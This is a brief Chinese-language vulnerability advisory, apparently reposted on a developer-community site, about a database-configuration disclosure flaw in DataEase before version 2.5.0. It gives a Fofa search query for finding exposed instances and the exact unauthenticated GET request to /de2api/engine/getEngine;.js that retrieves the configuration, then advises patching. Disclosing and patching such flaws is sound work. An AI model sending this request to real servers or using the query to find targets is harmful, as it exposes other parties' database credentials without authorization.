》》》产品描述《《《

    DataEase(github.com/dataease)是一款开源的数据可视化分析工具,可以帮助用户快速分析业务数据并洞察其趋势,为企业的业务改进与优化提供支持。


》》》漏洞描述《《《

    DataEase在版本2.5.0之前存在数据库配置信息暴露漏洞。通过浏览器访问/de2api/engine/getEngine;.js路径可以获取平台的数据库配置。该漏洞已在v2.5.0中修复,除了升级之外,没有已知的解决方法。


》》》搜索语句《《《

Fofa:body="Dataease"


》》》漏洞复现《《《

访问对应存在漏洞路径

GET /de2api/engine/getEngine;.js HTTP/1.1
Content-Type: application/json
Host: your-ip


》》》修复建议《《《

厂商已发布补丁,请更新至最新版

Logo

DAMO开发者矩阵,由阿里巴巴达摩院和中国互联网协会联合发起,致力于探讨最前沿的技术趋势与应用成果,搭建高质量的交流与分享平台,推动技术创新与产业应用链接,围绕“人工智能与新型计算”构建开放共享的开发者生态。

更多推荐